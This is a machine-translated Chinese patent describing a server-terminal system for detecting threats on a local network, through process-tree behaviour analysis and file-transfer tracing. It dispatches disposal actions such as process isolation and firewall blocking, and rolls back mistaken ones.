CN106657102A

CN106657102A - LAN based threat processing method and device

Info

Publication number: CN106657102A
Application number: CN201611250353.2A
Authority: CN
Inventors: 潘山; 孟君; 刘学忠
Original assignee: Beijing Qihoo Technology Co Ltd; Beijing Qianxin Technology Co Ltd
Current assignee: Beijing Qihoo Technology Co Ltd; Beijing Qianxin Technology Co Ltd
Priority date: 2016-12-29
Filing date: 2016-12-29
Publication date: 2017-05-10

Abstract

The embodiment of the invention provides an LAN based threat processing method and device. The LAN based threat processing method specifically comprises the steps of sending a threat processing task to a user terminal within the LAN to enable the user terminal to process a threat object corresponding to the thread processing task; and aiming at a target processing operation satisfying a preset rollback condition, sending a rollback processing task to the corresponding user terminal to enable the user terminal to roll back the target processing operation corresponding to the rollback processing task. The embodiment can detect unknown threat object of the LAN in time and accordingly can improve the real-time performance of safety detection; in addition, the embodiment of the invention can solve error processing problem automatically under the condition of saving manpower cost, and also can increase the error processing efficiency.

Description

A kind of threat treating method and apparatus based on LAN

Technical field

The present invention relates to computer security technique field, more particularly to a kind of threat processing method based on LAN and A kind of threat processing meanss based on LAN.

Background technology

With the rapid popularization of internet, LAN has become a requisite part in enterprise development.However, for While enterprise offers convenience, LAN is also faced with various attacks and threat, such as confidential leak, loss of data, net Network abuse, identity are falsely used, illegal invasion etc..

The existing threat processing scheme based on LAN in the terminal inside enterprise network mostly by being respectively mounted antivirus Software client, the viral load and virus harm journey in terminal is found by the antivirus software client based on virus characteristic storehouse Degree, and the viral load according to the enterprise network inside terminal carries out the security evaluation of enterprise network with the viral extent of injury.

For viral load and the viral extent of injury, although this method can to a certain extent embody enterprise The safe condition of net, but because virus characteristic storehouse has certain hysteresis quality relative to virus, there is the enterprise network of virus Jing is in the hole, and enterprise network in such cases already belongs to the network environment failed, and the network rings to failing Border is scored or is detected, belongs to the category of post, therefore the security of enterprise network cannot be effectively ensured.

The content of the invention

In view of the above problems, it is proposed that the present invention so as to provide one kind overcome the problems referred to above or at least in part solve on State a kind of threat processing method based on LAN and a kind of threat processing meanss based on LAN of problem.

According to one aspect of the present invention, there is provided a kind of threat processing method based on LAN, server is applied to, Including：

To the user terminal in the LAN issue threat disposal task so that the user terminal to the threat at Put the corresponding threat object of task and be disposed operation；

Target disposal operations for meeting preset rollback condition, to corresponding user terminal process rollback task is issued, So that the user terminal carries out rollback to the corresponding target disposal operations of the process rollback task.

According to another aspect of the present invention, there is provided a kind of threat processing method based on LAN, user's end is applied to End, including：

Task is disposed in the threat that the reception server is issued；

Operation is disposed to the corresponding threat object of the threat disposal task；

The reception server is for meeting the process rollback task that the target disposal operations of preset rollback condition are issued；

Rollback is carried out to the corresponding target disposal operations of the process rollback task.

In accordance with a further aspect of the present invention, there is provided a kind of threat processing meanss based on LAN, server is applied to, Including：

First task issues module, for issuing threat disposal task to the user terminal in the LAN, so that institute State user terminal and operation is disposed to the corresponding threat object of the threat disposal task；And

Second task issues module, for the target disposal operations for meeting preset rollback condition, to corresponding user Terminal issues process rollback task, so that the user terminal is carried out to the corresponding target disposal operations of the process rollback task Rollback.

According to another aspect of the invention, there is provided a kind of threat processing meanss based on LAN, it is applied to user's end End, including：

First receiver module, for the threat that the reception server is issued task is disposed；

Disposal operations module, for being disposed operation to the corresponding threat object of the threat disposal task；

Second receiver module, for the reception server for meeting the place that the target disposal operations of preset rollback condition are issued Reason rollback task；And

Roll-back module is disposed, for carrying out rollback to the corresponding target disposal operations of the process rollback task.

A kind of threat treating method and apparatus based on LAN according to embodiments of the present invention, can detect LAN Interior threat object, and threat disposal task is issued to the user terminal in the LAN, so that the user terminal is to institute State the corresponding threat object of threat disposal task and be disposed operation；Because above-mentioned threat object is exist to threaten in operating system Object, the detection of above-mentioned threat object can not be limited with certain hysteresis quality by virus characteristic storehouse relative to virus, Therefore the embodiment of the present invention can more in time detect the unknown threat object of LAN such that it is able to improve safety detection Promptness, and effective prevention of virus can be realized.

Also, for labor intensive cost, the embodiment of the present invention caused by the error handling for solving the problems, such as threat object Target disposal operations for meeting preset rollback condition, issue process rollback task, so that described to corresponding user terminal User terminal carries out rollback to the corresponding target disposal operations of the process rollback task.The object of above-mentioned rollback is grasped to dispose Make, it is possible thereby in the case where human cost is saved, automatic solving error handling problems, namely error handling can be improved Treatment effeciency.

Described above is only the general introduction of technical solution of the present invention, in order to better understand the technological means of the present invention, And can be practiced according to the content of specification, and in order to allow the above and other objects of the present invention, feature and advantage can Become apparent, below especially exemplified by the specific embodiment of the present invention.

Description of the drawings

By the detailed description for reading hereafter optional embodiment, various other advantages and benefit is common for this area Technical staff will be clear from understanding.Accompanying drawing is only used for illustrating the purpose of optional embodiment, and is not considered as to the present invention Restriction.And in whole accompanying drawing, it is denoted by the same reference numerals identical part.In the accompanying drawings：

The step of Fig. 1 shows a kind of threat processing method based on LAN according to an embodiment of the invention flow process Schematic diagram；

The step of Fig. 2 shows a kind of threat processing method based on LAN according to an embodiment of the invention flow process Schematic diagram；

Fig. 3 shows a kind of structural representation of process tree of the present invention；

The step of Fig. 4 shows a kind of threat processing method based on LAN according to an embodiment of the invention flow process Schematic diagram；

The step of Fig. 5 shows a kind of threat processing method based on LAN according to an embodiment of the invention flow process Schematic diagram；

The step of Fig. 6 shows a kind of threat processing method based on LAN according to an embodiment of the invention flow process Schematic diagram；

Fig. 7 shows that a kind of structure of threat processing meanss based on LAN according to an embodiment of the invention is shown Meaning；And

Fig. 8 shows that a kind of structure of threat processing meanss based on LAN according to an embodiment of the invention is shown Meaning.

Specific embodiment

The exemplary embodiment of the disclosure is more fully described below with reference to accompanying drawings.Although showing the disclosure in accompanying drawing Exemplary embodiment, it being understood, however, that may be realized in various forms the disclosure and should not be by embodiments set forth here Limited.On the contrary, there is provided these embodiments are able to be best understood from the disclosure, and can be by the scope of the present disclosure Complete conveys to those skilled in the art.

The embodiment of the present invention can detect the threat object in LAN, issue to the user terminal in the LAN Disposal task is threatened, so that the user terminal is disposed operation to the corresponding threat object of the threat disposal task.On Stating threat object can include：There is nonsystematic object for the system object or presence threat for threatening etc., wherein, above-mentioned system System object can include：Process, corresponding disposal operations can include：The process that there will be threat is put into isolated area etc.；It is above-mentioned System object can include：URL (URL, Uniform Resource Locator) accesses behavior, IP (networks Between interconnect agreement, Internet Protocol) access, port access, DNS (domain name system, Domain Name System), email address or Email attachment etc., then corresponding to disposal operations includes：Intercept to exist by firewall rule and threaten URL, IP or DNS etc., certain email address is intercepted by mail server, cancelled by mail server and have what is threatened Annex etc..It is appreciated that the embodiment of the present invention is not any limitation as specific threat object and its process operation.

Inventor has found that in the practice of the invention the detection technique imperfection of threat object causes prestige easily occur The phenomenon of side of body object wrong report (namely there will be no the object of threat as threat object), or, the reason such as error of keeper Cause under easily this occurs, to will further result in the error handling of threat object, for example, there will be no the process of threat Isolation just belongs to a kind of error handling.Or, the other reasonses such as error of keeper are also easily caused at the mistake of threat object Put.When there is error handling, the process of error handling is carried out according to manual type, more human cost will be expended, and Cause the treatment effeciency of error handling relatively low.

In order to improve the treatment effeciency of error handling, the embodiment of the present invention is disposed for the target for meeting preset rollback condition Operation, to corresponding user terminal process rollback task is issued, so that the user terminal is to the process rollback task correspondence Target disposal operations carry out rollback.The object of above-mentioned rollback is disposal operations, it is possible thereby in the situation for saving human cost Under, automatic solving error handling problems.

With reference to Fig. 1, a kind of step of threat processing method based on LAN according to an embodiment of the invention is shown Rapid flow chart, is applied to server, specifically may include steps of：

Step 101, to the user terminal in the LAN issue threat disposal task so that the user terminal is to institute State the corresponding threat object of threat disposal task and be disposed operation；

Step 102, the target disposal operations for meeting preset rollback condition, issue to corresponding user terminal and process back Rolling task, so that the user terminal carries out rollback to the corresponding target disposal operations of the process rollback task.

The embodiment of the present invention can apply in the LANs such as enterprise network, government's net, campus network；In above-mentioned LAN, The server refers to that the user terminal is referred to for controlling the equipment that other user terminals carry out safety detection in LAN The control instruction of response server in LAN, with the terminal that server carries out data interaction.In actual applications, can be in clothes Business device deployment server proxy module, in user terminal deployment software client modules, with similar C/S (client/server, Client/Server framework), realizes control function of the LAN server to user terminal, and, the control of user terminal System response and communication function.Wherein, can be by standard agreement or privately owned association between above-mentioned server and above-mentioned user terminal View is communicated, wherein, proprietary protocol has the advantages that closure and safe；It is appreciated that the embodiment of the present invention for Concrete communication mode between server and user terminal is not any limitation as.

In actual applications, the user of server can be that network manager waits the height with certain network security knowledge Level user, therefore, the user of server can flexibly set corresponding according to the current safety demand of LAN and actual conditions Control instruction.Wherein, above-mentioned threat disposes task, process rollback task and can be provided with corresponding control instruction.

In a kind of alternative embodiment of the present invention, the information of task is disposed in above-mentioned threat can be included：Threat object Information (such as threat object path, the file characteristic such as MD5 features of threat object in the user terminal) and disposal operations Information etc., the information of above-mentioned threat object can navigate to the threat object in user terminal, the information of above-mentioned disposal operations The clear and definite disposal operations of user terminal can be caused, it will be understood that the embodiment of the present invention is for the specifying information for threatening disposal task It is not any limitation as.

In actual applications, for task is disposed in the threat that keeper issued, under normal conditions, threat object Sample be deleted before, can be to threatening the corresponding disposal operations of disposal task carry out rollback.For convenience's sake, this Bright embodiment represents that needs carry out the disposal operations of rollback by meeting the target disposal operations of preset rollback condition.Wherein, on Stating target process operation can include：The error handling operation that the reasons such as threat object wrong report, keeper's error cause, Ke Yili Solution, keeper can process operation with preset above-mentioned target, and the embodiment of the present invention is not limited for specific target disposal operations System.

In another kind of alternative embodiment of the present invention, the information of above-mentioned process rollback task can include：Threat object Information or target disposal operations information or threaten information etc. of process task so that user terminal is realized for mesh The positioning of mark disposal operations, it will be understood that the embodiment of the present invention is not any limitation as the specifying information for processing rollback task.

In one kind application example of the present invention, it is assumed that target disposal operations are the process isolation etc. that there will be threat, then The process that corresponding rollback can threaten the presence is reduced from isolated area；Assume that target disposal operations are, are advised by fire wall Then intercept and there is URL, IP or the DNS etc. for threatening, then corresponding rollback can there will be URL, IP or DNS of threat from Remove in firewall rule, the embodiment of the present invention is not any limitation as specific rolling back action.

With reference to Fig. 2, a kind of step of threat processing method based on LAN according to an embodiment of the invention is shown Rapid flow chart, is applied to server, can be used to detect threat object, specifically may include steps of：

The process behavior that user terminal in step 201, the reception LAN is reported；

Step 202, according to the process behavior, set up the user terminal in process tree not in the same time and described Mapping relations in process tree between each process and process behavior；

Step 203, obtain from the process tree and meet the target process of preset process behavior pattern；

Step 204, according to the process behavior of the target process, judge whether the target process is threat object.

In the embodiment of the present invention, process tree is used as the detection foundation of malicious objects, in the analysis process of process tree In, can obtain in process tree never in the same time and there is the process tree of malicious act, and determine malicious objects in user terminal In the information such as path, file characteristic.

A kind of first control instruction may be used to indicate user terminal and report process behavior to server, then user terminal is connecing After receiving first control instruction, the process behavior of local process can be monitored, and report what is monitored to server Process behavior.Alternatively, the embodiment of the present invention can not affect user for user terminal normal use in the case of, catch The process behavior of simultaneously report of user terminal is obtained, therefore the experience of user can not be affected.

Alternatively, above-mentioned process behavior can be including but not limited to：Process start and stop behavior, internal memory behavior and change behavior In at least one.Wherein, above-mentioned internal memory behavior can include：Process injection behavior, file access behavior and network connection Behavior；Above-mentioned network connection behavior can include：URL is accessed in the behaviors such as behavior, IP access, port access and DNS access At least one.Above-mentioned change behavior can include：System variation behavior (establishment, deletion and the modification of registration table), account become More (establishment of account, the change of account authority) behavior and document change behavior.It is appreciated that the embodiment of the present invention for Specific process behavior is not any limitation as.

After the process behavior that each user terminal is reported is received, the information of the process behavior that server can be to receiving is entered Row record.Alternatively, the information of process behavior can be including but not limited to：The information of process, execution parameter of process behavior etc. The information of field.

In the embodiment of the present invention, process tree is the relation on a kind of user terminal between process, its generally by parent process and Subprocess two parts are constituted.After some program process operations, other processes can be created or be called, thus constitute a process Tree.With reference to Fig. 3, a kind of structural representation of process tree of the present invention is shown, wherein, child node B and C of node A are node A Create or the subprocess that calls, as parent process, node B and node C be respectively created again or have invoked respective subprocess D, E, And F and G.The information of each process can include in process tree：Process title, the characteristic value of process correspondence program and process Parent process etc., it will be understood that the embodiment of the present invention is not any limitation as the specifying information of each process in process tree.In reality In the application of border, the title of each node can be identical or different from the process title of each process in process tree, the embodiment of the present invention It is main by the title of each node in process tree can it is identical with the process title of each process as a example by illustrate.

In a kind of alternative embodiment of the present invention, can be according to the process start and stop behavior included by stroke behavior, it is proposed that Above-mentioned user terminal is in process tree not in the same time.Alternatively, process start and stop behavior can include：The starting time of each process, The information such as dwell time and each process creation or the process called, as such, it is possible to obtain process tree according to process start and stop behavior In each node.For example, the starting time of process A, process B and process C is respectively moment 1, moment 2 and moment 3, it is assumed that process A be system in first process, then can obtain the root node A in process tree, it is assumed that process A create or have invoked process B and Process C, then can obtain child node B and C of root node A, and according to above-mentioned flow process the process tree shown in Fig. 2 can be obtained.Need Illustrate, process tree can change with the change of process start and stop behavior, it is hereby achieved that user terminal is in difference The process tree at quarter, also, contrasted by the process tree to the Qian Hou moment, the change of process start and stop behavior can be obtained.

In another kind of alternative embodiment of the present invention, the method for the present embodiment can also include：Receive user's end The system snapshot at certain moment that end reports；It is then described according to the process behavior, the user terminal is set up not in the same time Process tree the step of 202, can include：On the basis of the system snapshot, according to above-mentioned process behavior the use is set up Family terminal is in process tree not in the same time.In the embodiment of the present invention, what system snapshot can be used for expression user terminal moment T is System state, the system mode can include：The state such as process that certain moment T systems are included and its behavior, registration table, file, can To think, the system snapshot can include the process tree of certain moment T, therefore the embodiment of the present invention is on the basis of the system snapshot On, according to above-mentioned process behavior the user terminal is set up in process tree not in the same time, can reduce process tree sets up institute The operand for needing, improve process tree sets up efficiency.

In another alternative embodiment of the present invention, the system snapshot can be the user terminal at the first moment The system mode of T1, the process behavior can include：Process start and stop behavior, then it is described on the basis of the system snapshot, The user terminal is set up the step of not process tree in the same time, can include according to above-mentioned process behavior：According to described Process start and stop behavior after one moment T1, obtains process tree of the user terminal in the second moment T2.Wherein, T2 is later than T1, that is, can add or deletion of node, to obtain the T2 moment on the basis of said system snapshot correspondence process tree 1 Process tree.Alternatively, T1 can be os starting after the completion of any time, for example, os starting complete when Carve as T0, T1 for T0 subsequent time；Certainly, the embodiment of the present invention is not any limitation as specific T1.

In a kind of alternative embodiment of the present invention, the process behavior can include：Process start and stop behavior and/or internal memory A series of behaviors produced after the process initiation such as behavior and/or change behavior, then it is described according to the process behavior, set up described In process tree 202 the step of mapping relations between each process and process behavior, can include：For respectively entering in the process tree Journey, sets up it with the mapping relations between process start and stop behavior and/or internal memory behavior and/or change behavior.

User terminal each process and process in process tree not in the same time and the process tree are set up in step 202 After mapping relations between behavior, step 203 can obtain the mesh for meeting preset process behavior pattern from the process tree Mark process.

Preset behavior pattern can be used to represent the suspicious actions pattern or malicious act pattern of process behavior.Actually should With in, any preset behavior pattern that those skilled in the art can be according to needed for practical application request determines.The present invention's In a kind of alternative embodiment, above-mentioned preset behavior pattern can be that file associated process starts non-OS process, for example The subprocess of winword process initiation Liao Fei Microsofts, wherein, winword processes are file associated process.In the another of the present invention In planting alternative embodiment, above-mentioned preset behavior pattern can be, in process change file system after the first file, access second literary Part is simultaneously encrypted.For example, it is quick to visit after the file in process change MFT (big file transmission, Managed File Transfer) Ask office documents；The preset behavior pattern belongs to the behavior that malicious process extorts software, and the malicious process is deleted first in MFT File record, so that file record cannot recover, then begins look for document and is encrypted.

In actual applications, each process in process tree can be traveled through, and for traveling through the current process for obtaining, from Corresponding current process behavior is obtained in above-mentioned mapping relations, and judges whether the current behavior pattern meets preset behavior mould Formula, it will be understood that the embodiment of the present invention meets the target process of preset process behavior pattern for obtaining from the process tree Detailed process be not any limitation as.

The process behavior of the target process that step 204 can be obtained according to step 203, judges that whether the target process is Threat object.

The embodiment of the present invention can provide the process behavior according to the target process, judge that whether the target process is The following detection mode of threat object；

Detection mode 1, corresponding warning information is sent for the target process, so that administrator is directed to the announcement Alarming information, according to the process behavior of the target process, judges whether the target process is threat object；And/or

Detection mode 2, using descendants's process of the target process or the target process as process to be analyzed, according to According to the execution parameter of the process behavior of the process to be analyzed, judge whether the target process is threat object.

Wherein, detection mode 1 can send corresponding warning information for the target process, so that administrator connects The warning information is received, and the security of target process is detected by manual type.For example, can be by manual type to process Behavior is analyzed, and judges the security of target process according to analysis result, and corresponding analysis process can include：Behavior row For the specific fields such as execution parameter exclusion and statistical operation etc..

Detection mode 2 can be using descendants's process of the target process or the target process as process to be analyzed, then The execution parameter of the process behavior of the process to be analyzed may indicate that target process performs which behavior that generates, or mesh Which behavior is descendants's process of mark process generate, as such, it is possible to whether judge the target process according to above-mentioned execution parameter For threat object.

In a kind of alternative embodiment of the present invention, the process behavior according to the process to be analyzed performs ginseng Number, the step of whether judge the target process be threat object, can include：

If the order line script environment parameter that the execution parameter is included is related to script encryption behavior, the target process Safety detection result for dangerous；And/or

If the strategy that the execution parameter is included excludes parameter to be related to bypass the behavior for performing restriction strategy, the target The safety detection result of process is dangerous.

Wherein, powershell can be a kind of example of order line script environment parameter, if the operation of powershell Parameter includes the script encryption behavior of the parameter of such as enc, it is believed that the safety detection result of target process is uneasiness Entirely.

Excludepolicy can be a kind of example that strategy excludes parameter, if Excludepolicy is related to bypass execution The behavior of restriction strategy, then it is considered that the safety detection result of target process is dangerous.Wherein, performing restriction strategy is One group policy, in the case where opening and limiting, can prevent from performing order by powershell, but have many methods can Above-mentioned execution restriction strategy is performed to bypass, this allows malicious process to have an opportunity to take advantage of.The embodiment of the present invention is according to described to be analyzed The execution parameter to be analyzed of the process behavior of process, during judging whether the target process is threat object, can hold The execution parameter to be analyzed of the process behavior of row process to be analyzed, in the case where restriction strategy unlatching restriction is performed, if performing Above-mentioned parameter to be analyzed can then send corresponding information, and the embodiment of the present invention can by EDR (end-point detection is responded, Endpoint detection and response) the above-mentioned information of elements capture, if acquisition success, it is believed that Excludepolicy is related to bypass the behavior for performing restriction strategy, it is further believed that the safety detection result of target process is It is dangerous.

It is appreciated that the order line script environment parameter that above-mentioned execution parameter is included is related to script encryption behavior and performs ginseng The strategy exclusion parameter that number is included is related to bypass the corresponding detection process of behavior of execution restriction strategy and is intended only as the present invention's Alternative embodiment, in fact, those skilled in the art can be with according to practical application request, to performing other rows that parameter is included To be detected, the embodiment of the present invention judges the mesh for the execution parameter of the process behavior according to the process to be analyzed Whether mark process is that the detailed process of threat object is not any limitation as.Additionally, it is appreciated that in the embodiment of the present invention, target is entered The safety detection result of journey can also include：Safety.

To sum up, the threat processing method based on LAN of the embodiment of the present invention, can detect the threat in LAN Object, and to the user terminal in the LAN issue threat disposal task so that the user terminal to the threat at Put the corresponding threat object of task and be disposed operation；Because above-mentioned threat object is the presence of the object of threat in operating system, The detection of above-mentioned threat object can not be had certain hysteresis quality to be limited by virus characteristic storehouse relative to virus, therefore this Bright embodiment can more in time detect the unknown threat object of LAN such that it is able to improve the promptness of safety detection, And can realize virus effective prevention.

In addition, the process behavior that the embodiment of the present invention can be reported with foundation user terminal, sets up the user terminal and exists Mapping relations in process tree not in the same time and the process tree between each process and process behavior, and from the process Obtain in tree and meet the target process of preset process behavior pattern, and then according to the process behavior of the target process, judge institute State whether target process is threat object；Wherein, above-mentioned preset behavior pattern can be used to represent the suspicious actions mould of process behavior Formula or malicious act pattern, due to the embodiment of the present invention based on user terminal process tree not in the same time and it is described enter The analysis of the mapping relations between each processes of Cheng Shuzhong and process behavior, acquisition meets the target of preset process behavior pattern and enters Journey, and according to the process behavior of the target process, judge whether the target process is threat object；Accordingly, with respect to biography The virus characteristic storehouse of system, the embodiment of the present invention can be by each process and process in process tree, the process tree not in the same time The suspicious actions pattern or the preset behavior mould of malicious act pattern of mapping relations and sign process behavior between behavior Formula, detects more in time unknown threat and the potential safety hazard of LAN such that it is able to improve the promptness of safety detection, and energy Enough effective preventions for realizing virus.

With reference to Fig. 4, a kind of step of threat processing method based on LAN according to an embodiment of the invention is shown Rapid flow chart, is applied to user terminal, specifically may include steps of：

Task is disposed in the threat that step 401, the reception server are issued；

Step 402, operation is disposed to the threat corresponding threat object of disposal task；

Step 403, the reception server are directed to and meet the process rollback times that the target disposal operations of preset rollback condition are issued Business；

Step 404, rollback is carried out to the process corresponding target disposal operations of rollback task.

In actual applications, task is disposed in the threat that user terminal can be issued according to server, navigates to corresponding prestige Side of body object, and operation is disposed to the threat object.

It should be noted that the target disposal operations of the embodiment of the present invention can be corresponding with the rollback of target disposal operations Operation.Assume that target disposal operations are that the process that there will be threat is put into isolated area etc., then corresponding rollback can be present this The process of threat is reduced from isolated area；Assume target disposal operations be, by firewall rule intercept exist threaten URL, IP, Or DNS etc., then corresponding rollback can there will be and be removed in URL, IP or DNS slave firewall rule of threat, this Bright embodiment is not any limitation as specific target disposal operations with rolling back action.

In a kind of alternative embodiment of the present invention, described to the corresponding target disposal operations of the process rollback task Before the step of carrying out rollback, methods described can also include：Issue the user with the corresponding target of the process rollback task Put the rollback information of operation；According to user for the confirmation of the rollback information is operated, the process rollback is appointed Corresponding target disposal operations of being engaged in carry out rollback.Above-mentioned rollback information can ensure that the accuracy of rolling back action.

To sum up, the threat processing method based on LAN of the embodiment of the present invention, user terminal can be for meeting preset The target disposal operations of rollback condition carry out rollback.The object of above-mentioned rollback be disposal operations, it is possible thereby to save manpower into In the case of this, automatic solving error handling problems, namely the treatment effeciency that error handling can be improved.

With reference to Fig. 5, a kind of step of threat processing method based on LAN according to an embodiment of the invention is shown Rapid flow chart, is applied to server, specifically may include steps of：

The process behavior that user terminal in step 501, the reception LAN is reported；

Step 502, according to the process behavior, set up the user terminal in process tree not in the same time and described Mapping relations in process tree between each process and process behavior；

Step 503, obtain from the process tree and meet the target process of preset process behavior pattern；

Step 504, according to the process behavior of the target process, judge whether the target process is threat object；

Relative to embodiment of the method shown in Fig. 2, the method for the present embodiment can also include：

If step 505, the target process are threat object, the abnormal document involved by the target process is obtained, And obtain file transmission events to be analyzed corresponding with the abnormal document from the advance file transmission events for obtaining；Wherein, The file transmission events are the event that the user terminal in the LAN is reported；

Step 506, the information to the file transmission events to be analyzed are analyzed, to obtain the abnormal document correspondence Transmission source and/or affected user terminal.

In the embodiment of the present invention, a kind of second control instruction may be used to indicate user terminal and transmit to server reporting file Event, then user terminal local file transmission events can be monitored after second control instruction is received, and to Server reports the file transmission events for monitoring.

In the embodiment of the present invention, file transmission events can be used to represent the circulation event of subscriber terminal side file, alternatively, The information of file transmission events can include at least one in following information：Temporal information, channel information, fileinfo, text Part transmission direction and end message.Wherein, temporal information can be used to represent the time of origin of file transmission events；Channel information can For representing the passage of file transmission events, alternatively, the channel information can be the corresponding application program of file transmission events Information or site information；Fileinfo can be used to identify file, and alternatively, this document information can be including but not limited to：Text Part name, file path, file characteristic, for example, this document feature can be such as MD5 (Message Digest 5 the 5th edition, Message Digest Algorithm5) feature, it will be understood that the embodiment of the present invention is not any limitation as specific file characteristic；Text Part transmission direction can include：Enter direction or outgoing direction；End message can be used to represent the user that file transmission events occur The information of terminal.

In one kind application example of the present invention, above-mentioned file transmission events can include：The transmission of browser file, IM The transmission of (instant messaging, Instant Messaging) file, email attachment file transmission, USB flash disk (USB flash drive, USB flash Disk at least one during) file transmission and download tool file are transmitted.Each file transmission events of subscriber terminal side It is reported to server, while what is reported can include：The information of each file transmission events.

After the file transmission events that each user terminal is reported are received, server can be to the file transmission events of reception Information recorded, it should be noted that the embodiment of the present invention can only such as filename of log file transmission events, The fileinfo of file path or file characteristic；Because above-mentioned fileinfo be enough to realize the file propagation path of file Follow the trail of, therefore the embodiment of the present invention can realize the record of the information for file transmission events in the case where file is not preserved, Therefore, it is possible to save the memory space of server.

After the information for obtaining abnormal document, step 505 can obtain from the advance file transmission events for obtaining with it is different Normal corresponding file transmission events to be analyzed of file, specifically, can be by the information of abnormal document and each file transmission events Information is matched, if the match is successful, using the file transmission events that the match is successful as file transmission events to be analyzed..Example Such as, the file characteristic of abnormal document and the file characteristic of file transmission events can be carried out matching etc., it will be understood that this Bright embodiment is for from acquisition file transmission events to be analyzed corresponding with abnormal document in the advance file transmission events for obtaining Detailed process be not any limitation as.

The information of the file transmission events to be analyzed that step 506 can be obtained to step 505 is analyzed, described to obtain The corresponding transmission source of abnormal document and/or affected user terminal.

Because file transmission events can be used to represent the circulation event of subscriber terminal side file, each text of subscriber terminal side Part transmission events are all reported to server, therefore the embodiment of the present invention can be based on pair to be analyzed file related to abnormal document The analysis of the information of transmission events, obtains the corresponding transmission source of abnormal document；Accordingly, with respect to traditional virus characteristic storehouse, The file transmission events that the embodiment of the present invention can be reported by user terminal, detect more in time the unknown threat of LAN And potential safety hazard such that it is able to improve the promptness of safety detection；Further, can as early as possible to the corresponding biography of the abnormal document Defeated source carries out intercept process, to realize the closure of the propagation path for abnormal document.

In addition, the file transmission events that the embodiment of the present invention can be reported by user terminal, detect more in time out The affected user terminal affected by abnormal document in the net of domain, therefore can realize as soon as possible for the reparation of above-mentioned impacted terminal Process, so, can not only in time prevent abnormal document for the impact of user terminal, and can be effective to a certain extent The user of protection user terminal.

In a kind of alternative embodiment of the present invention, the above-mentioned information to the file transmission events to be analyzed is analyzed The step of 506, can include：According to the temporal information of the file transmission events to be analyzed, transmit from the file to be analyzed The earliest file destination transmission events of time of origin are obtained in event, and the channel according to the file destination transmission events is believed Breath, obtains the corresponding transmission source of the abnormal document.When can be used to represent the generation of file transmission events due to temporal information Between, therefore can obtain from multiple file transmission events to be analyzed and occur according to the temporal information of each Study document transmission events Time earliest file destination transmission events, as the corresponding file transmission events of Spreading source, further, it is possible to according to target The channel information of file transmission events, obtains the corresponding transmission source of the abnormal document.

In one kind application example of the present invention, it is assumed that abnormal document is " buying table .doc ", then can be according to the exception File correspondence file to be analyzed transmits the temporal information of file, obtains the wherein earliest file destination transmission events of time of origin, The event relevant with the abnormal document occurred first in the file destination transmission events namely LAN.For example, this is abnormal literary The direction of part is that, into direction, the abnormal document enters LAN by channels such as browser, mailbox or USB flash disks, then can be according to Corresponding transmission source is obtained according to above-mentioned channel information.Alternatively, above-mentioned transmission source can be including but not limited to：Threat URL, Threat virus characteristic that threat mailbox contact person, threat IP, threat DNS or analysis are obtained etc..

In another kind of alternative embodiment of the present invention, the method for the present embodiment can also include：To the abnormal document Corresponding transmission source carries out intercept process.Intercept process is carried out to the corresponding transmission source of the abnormal document, it is possible to achieve For the closure of the propagation path of abnormal document.

Alternatively, it is described the step of carry out intercept process to the corresponding transmission source of the abnormal document, can include：Pin Transmission source corresponding to the abnormal document, arranges corresponding firewall rule, right to be realized by the firewall rule In the interception in the transmission source.For example, can be directed to and threaten URL, threaten mailbox contact person, threaten IP, threaten DNS etc., if Corresponding firewall rule is put, to realize for the transmission such as threat URL, threat mailbox contact person, threat IP, threat DNS are originated Interception, can for example prevent the mail for threatening mailbox contact person to send.

It is appreciated that it is optional to realize that the interception originated for the transmission is intended only as above by the firewall rule Embodiment, in fact, those skilled in the art are not any limitation as specific intercept process mode, such as it is viral for threatening For feature, can also be impended intercept process of virus characteristic etc. by virus characteristic storehouse, it will be understood that realize for Any intercept process mode of the interception in transmission source is within the protection domain of the embodiment of the present invention.

In a kind of alternative embodiment of the present invention, the above-mentioned information to the file transmission events to be analyzed is analyzed The step of 506, can include：According to the end message of the file transmission events to be analyzed, the abnormal document correspondence is obtained Affected user terminal.Because file transmission events to be analyzed are corresponding with abnormal document, therefore pass according to file to be analyzed The end message of defeated event can obtain the corresponding affected user terminal of abnormal document.In one kind application example of the present invention In, it is assumed that abnormal document is " buying table .doc ", and its first file transmission events in LAN is the postal by mailbox Part attachment transmission, it is assumed that the user 1 of first file transmission events further generates second file and passes by IM modes Defeated event, and user 2 is given by abnormal document transmission, user 2 further generates the 3rd by the Email attachment of mailbox File transmission events, and give user 3 by abnormal document transmission ... further, user 1, user 2 and user 3 also trigger it His file transmission events, it is assumed that the quantity of file transmission events is N, and N is positive integer, then the embodiment of the present invention can consider the N The corresponding terminal of individual file transmission events is impacted terminal.

In another kind of alternative embodiment of the present invention, the method for the present embodiment can also include：To the impacted use Family terminal carries out early warning process.For example, above-mentioned early warning is processed can send first to the user terminal for storing above-mentioned abnormal document Notification message, the USB flash disk to storing above-mentioned abnormal document sends second notification message etc., to realize for the closure of propagation path.

In another alternative embodiment of the present invention, the method for the present embodiment can also include：To the impacted use Family terminal carries out repair process.Alternatively, above-mentioned repair process can be with：The abnormal document for having transmitted is recalled, for example, can be right The abnormal document transmitted by Email attachment carries out recalling etc..

In another alternative embodiment of the present invention, carry out that repair process is corresponding to repair to the affected user terminal Compound formula, can include：

Repair mode 1, in single affected user terminal the corresponding process of abnormal document described in killing, if killing into Work(, the then corresponding process of abnormal document described in killing in all affected user terminals；Or

Repair mode 2, in single affected user terminal the corresponding process of abnormal document described in killing, if killing lose Lose, then carry out after data backup for each affected user terminal, update the operating system of each affected user terminal.

Wherein, repair mode 1 can attempt the abnormal document described in killing in single affected user terminal it is corresponding enter Journey, and judge whether the isolation that can realize the corresponding process of abnormal document according to killing result, if, then it is assumed that killing into Work(, therefore can the synchronously killing operation of the corresponding process of above-mentioned abnormal document in all affected user terminals.

Repair mode 2 then suitable for the situation of killing failure, specifically, can enter line number for each affected user terminal After backup, the operating system of each affected user terminal is updated；For example, the user data of affected user terminal can be copied Shellfish resets system to non-system disk or the mobile device of safety in affected user terminal.

It should be noted that during above-mentioned repair mode 1 and/or repair mode 2 is performed, can be by aforementioned step Rapid 101 to affected user terminal issues corresponding threat disposal task.Also, issuing accordingly to affected user terminal After threatening disposal task, if finding to threaten the corresponding disposal operations of disposal task to there is mistake, can there will be mistake Disposal operations issue process rollback times as the target disposal operations for meeting preset rollback condition to corresponding user terminal Business, so that the user terminal carries out rollback to the corresponding target disposal operations of the process rollback task.

